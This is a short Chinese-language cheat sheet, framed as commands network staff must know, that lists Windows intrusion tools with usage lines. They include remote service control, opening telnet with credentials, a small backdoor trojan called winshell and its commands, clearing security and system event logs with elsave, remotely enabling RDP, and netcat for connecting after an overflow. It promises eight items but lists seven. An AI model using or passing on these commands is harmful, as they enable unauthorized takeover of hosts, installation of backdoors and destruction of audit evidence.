网络人员必须知道的八条命令
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc/list地址
netsvcschedule地址/query
netsvc地址schedule/start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet地址用户名密码17878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnetIP地址7878
三、winshell.exe
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
pPath(查看winshell主程序的路径信息)
breBoot(重新启动机器)
dshutDown(关闭机器)
sShell(执行后你就会看到可爱的“C:\>”)
xeXit(退出本次登录会话,此命令并不终止winshell的运行)
CMD>(通过http下载其他网站上的文件到运行winshell的机器上)
四、3389登陆器,GUI方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave-s地址-l\"application\"-C
elsave-s地址-l\"system\"-C
elsave-s地址-l\"security\"-C
执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot[/r]
使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处:nc[-options]hostnameport[s][ports]...
绑定端口等待连接:nc-l-pport[-options][hostname][port]